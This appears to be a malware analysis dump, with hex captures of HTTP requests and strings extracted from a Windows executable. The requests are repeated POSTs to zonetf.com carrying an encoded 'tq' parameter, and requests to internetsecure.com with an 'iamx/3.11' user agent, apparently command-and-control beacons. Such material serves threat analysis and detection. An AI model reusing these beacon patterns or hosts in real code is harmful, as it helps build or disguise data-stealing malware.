0x000001d0 (00464)   20485454 502f312e 300d0a43 6f6e6e65    HTTP/1.0..Conne
0x000001e0 (00480)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x000001f0 (00496)   73743a20 7777772e 696e7465 726e6574   st: www.internet
0x00000200 (00512)   73656375 72652e63 6f6d0d0a 41636365   secure.com..Acce
0x00000210 (00528)   70743a20 2a2f2a0d 0a557365 722d4167   pt: */*..User-Ag
0x00000220 (00544)   656e743a 2069616d 782f332e 31310d0a   ent: iamx/3.11..
0x00000230 (00560)   0d0a                                  ..

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a755825 32425039 68253242 49307344   JuX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683873 47253242 636f4a73   OhLgjh8sG%2BcoJs
0x000000c0 (00192)   58253242 534e776c 4b763937 35586c6d   X%2BSNwlKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6574 662e636f 6d0d0a55   t: zonetf.com..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 290d0a43   ndows NT 5.1)..C
0x00000130 (00304)   6f6e7465 6e742d4c 656e6774 683a2030   ontent-Length: 0
0x00000140 (00320)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000150 (00336)   6f73650d 0a0d0a3c 6872202f 3e0a2020   ose....<hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a755825 32425039 68253242 49307344   JuX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 79253242 636f4a74   OhLgjh88y%2BcoJt
0x000000c0 (00192)   58253242 534e7846 4b763937 35586c6d   X%2BSNxFKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6574 662e636f 6d0d0a55   t: zonetf.com..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 290d0a43   ndows NT 5.1)..C
0x00000130 (00304)   6f6e7465 6e742d4c 656e6774 683a2030   ontent-Length: 0
0x00000140 (00320)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000150 (00336)   6f73650d 0a0d0a79 35453162 74596956   ose....y5E1btYiV
0x00000160 (00352)   33537543 42414134 61462532 4655354e   3SuCBAA4aF%2FU5N
0x00000170 (00368)   79512532 46476d59 394f5161 326e3064   yQ%2FGmY9OQa2n0d
0x00000180 (00384)   6d794754 44624f78 43525225 32426435   myGTDbOxCRR%2Bd5
0x00000190 (00400)   7471556a 46697939 65685247 4a4a6747   tqUjFiy9ehRGJJgG
0x000001a0 (00416)   44796b39 5a43395a 50253242 72724466   Dyk9ZC9ZP%2BrrDf
0x000001b0 (00432)   51634f70 33637234 57636263 5139486d   QcOp3cr4WcbcQ9Hm
0x000001c0 (00448)   25324249 6f447666 6b4a747a 35514434   %2BIoDvfkJtz5QD4
0x000001d0 (00464)   20485454 502f312e 300d0a43 6f6e6e65    HTTP/1.0..Conne
0x000001e0 (00480)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x000001f0 (00496)   73743a20 7777772e 696e7465 726e6574   st: www.internet
0x00000200 (00512)   73656375 72652e63 6f6d0d0a 41636365   secure.com..Acce
0x00000210 (00528)   70743a20 2a2f2a0d 0a557365 722d4167   pt: */*..User-Ag
0x00000220 (00544)   656e743a 2069616d 782f332e 31310d0a   ent: iamx/3.11..
0x00000230 (00560)   0d0a                                  ..

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a755825 32425039 68253242 49307344   JuX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a682532 464d6525 3242636f   OhLgjh%2FMe%2Bco
0x000000c0 (00192)   4a755825 3242534e 78564b76 39373558   JuX%2BSNxVKv975X
0x000000d0 (00208)   6c6d3547 20485454 502f312e 310d0a48   lm5G HTTP/1.1..H
0x000000e0 (00224)   6f73743a 207a6f6e 6574662e 636f6d0d   ost: zonetf.com.
0x000000f0 (00240)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000100 (00256)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000110 (00272)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000120 (00288)   57696e64 6f777320 4e542035 2e31290d   Windows NT 5.1).
0x00000130 (00304)   0a436f6e 74656e74 2d4c656e 6774683a   .Content-Length:
0x00000140 (00320)   20300d0a 436f6e6e 65637469 6f6e3a20    0..Connection: 
0x00000150 (00336)   636c6f73 650d0a0d 0a72202f 3e0a2020   close....r />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a755825 32425039 68253242 49307344   JuX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 42537225 32466525   OhLgjh88BSr%2Fe%
0x000000c0 (00192)   32425635 5a755267 25334425 33442048   2BV5ZuRg%3D%3D H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a207a   TTP/1.1..Host: z
0x000000e0 (00224)   6f6e6574 662e636f 6d0d0a55 7365722d   onetf.com..User-
0x000000f0 (00240)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000100 (00256)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000110 (00272)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000120 (00288)   73204e54 20352e31 290d0a43 6f6e7465   s NT 5.1)..Conte
0x00000130 (00304)   6e742d4c 656e6774 683a2030 0d0a436f   nt-Length: 0..Co
0x00000140 (00320)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000150 (00336)   0a0d0a0d 0a0d0a79 35453162 74596956   .......y5E1btYiV
0x00000160 (00352)   33537543 42414134 61462532 4655354e   3SuCBAA4aF%2FU5N
0x00000170 (00368)   79512532 46476d59 394f5161 326e3064   yQ%2FGmY9OQa2n0d
0x00000180 (00384)   6d794754 44624f78 43525225 32426435   myGTDbOxCRR%2Bd5
0x00000190 (00400)   7471556a 46697939 65685247 4a4a6747   tqUjFiy9ehRGJJgG
0x000001a0 (00416)   44796b39 5a43395a 50253242 72724466   Dyk9ZC9ZP%2BrrDf
0x000001b0 (00432)   51634f70 33637234 57636263 5139486d   QcOp3cr4WcbcQ9Hm
0x000001c0 (00448)   25324249 6f447666 6b4a747a 35514434   %2BIoDvfkJtz5QD4
0x000001d0 (00464)   20485454 502f312e 300d0a43 6f6e6e65    HTTP/1.0..Conne
0x000001e0 (00480)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x000001f0 (00496)   73743a20 7777772e 696e7465 726e6574   st: www.internet
0x00000200 (00512)   73656375 72652e63 6f6d0d0a 41636365   secure.com..Acce
0x00000210 (00528)   70743a20 2a2f2a0d 0a557365 722d4167   pt: */*..User-Ag
0x00000220 (00544)   656e743a 2069616d 782f332e 31310d0a   ent: iamx/3.11..
0x00000230 (00560)   0d0a                                  ..

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a755825 32425039 68253242 49307344   JuX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683873 47253242 636f4a74   OhLgjh8sG%2BcoJt
0x000000c0 (00192)   58253242 534e7a56 4b763937 35586c6d   X%2BSNzVKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6574 662e636f 6d0d0a55   t: zonetf.com..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 290d0a43   ndows NT 5.1)..C
0x00000130 (00304)   6f6e7465 6e742d4c 656e6774 683a2030   ontent-Length: 0
0x00000140 (00320)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000150 (00336)   6f73650d 0a0d0a0d 0a72202f 3e0a2020   ose......r />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.


Strings
.
..
+4.
040904b0
1303
PrivateBuild
StringFileInfo
TIMES NEW ROMAN
Translation
VarFileInfo
VS_VERSION_INFO
<0&I9G
0Z/17n
1-(eW7
~}1XbRA
2,598>
2r='Z!
4ti6<}
4X)T9U(.h
!)52`6T
5D07TV]}
_<6a9g
{+6inrxO
7@";hs
9Pq}[u
&:9Rfk
9s|{'u
|a\]|1
ADVAPI32.dll
a ,@HW
AlphaBlend
BitBlt
.c4,iQI1
cFKA]\
ClipCursor
CoCreateInstance
CoFreeUnusedLibraries
CoInitialize
COMCTL32.dll
CoUninitialize
CreateBitmap
CreateCompatibleDC
CreateDCW
CreateDIBSection
CreatePen
CreatePopupMenu
@.data
DeleteDC
DestroyMenu
DH&F}M
DiZB^@
DkzA{]\
D`*VVl9
eE:O}j
EnumResourceNamesW
ExitProcess
FileTimeToSystemTime
FindWindowA
Fi?.t# "
fjy-`CCH 
F{&	Tj(
GDI32.dll
GdipCreateBitmapFromFile
GdipDisposeImage
GdipGetImageHeight
GdipGetImagePixelFormat
GdipGetImageWidth
gdiplus.dll
GetDesktopWindow
GetModuleFileNameA
GetObjectType
GetVersionExA
GIJ4@r
g|rgVZ+]$
G&V	V\@
{HJKUE
|$ .hOt@
Hqr]tZ
hw|kDY
Ids\B=
iJ6# U_e
)}><IL
ImageList_DragEnter
ImageList_DragLeave
ImageList_DragMove
i,oXos
J}}<[?
J!)&2}.
J[32au
,.Ja/FV
+j/(:G
j(?J1G
^.:Js.
K:8)W+
KERNEL32.dll
kfv&o/
kJ-Lxr
Lc2]N8
LhR}hR
LineTo
"]ln3n
LoadLibraryW
LocalAlloc
LocalFree
;!":[M
+m[KKD
Mq6{O(
MSIMG32.dll
N+*%6#
-nd;k3
}<nmYf
NN>u|;+
ny*t+Z
/O/7}C+Aa
o/IYHig
ole32.dll
oTV.h.s@
:Ow%p!0
	OzYXOa
p6Sfia
pDPk\BZ
<\p(u+|
[=@&+q
QyC*=	.&
`.rdata
RedrawWindow
RegCloseKey
RegCreateKeyW
RegDeleteKeyW
RegEnumKeyExW
RegOpenKeyExW
RegQueryValueExW
RegSetValueExW
RegSetValueW
r[h5@Q'J
RichY5
-!>rQ&
sBeu 0
SelectObject
SetStretchBltMode
sIz	`Ll
<souFc
-sr( F
S^*}S=
StretchBlt
StringFromGUID2
TF4en%
Tgb$*-
!This program cannot be run in DOS mode.
ThLoad
timeGetTime
_}To8iE
_&TQ/6
TrackPopupMenuEx
TransmitCommChar
TransparentBlt
uf./O_
**u(mE
USER32.dll
.USS/r2g
uT,LGj:
V.h	u@
V*Hw	B
&*ViE7v*
-ViZm?
~?)vM 
+VO%5-
vs4Wr32hl
V*SV*._
V~X9bc
w\3L8S
;+w(BG
wC%s)K3
WINMM.dll
W|(XUi
wXv6}"
|X58~R
%x\7Kr&$
)x)8T)
#~XDe;
x f#L)
xicT)S
xy,b!"
}=y;)5
;yjzEn	
$yMy!~
Yt}4,0
y\V~y:
?$Ywy\C
y</wys
yx_?g7
~\Z#^,
	`)Z|@
z59Mu[@
z7!*jf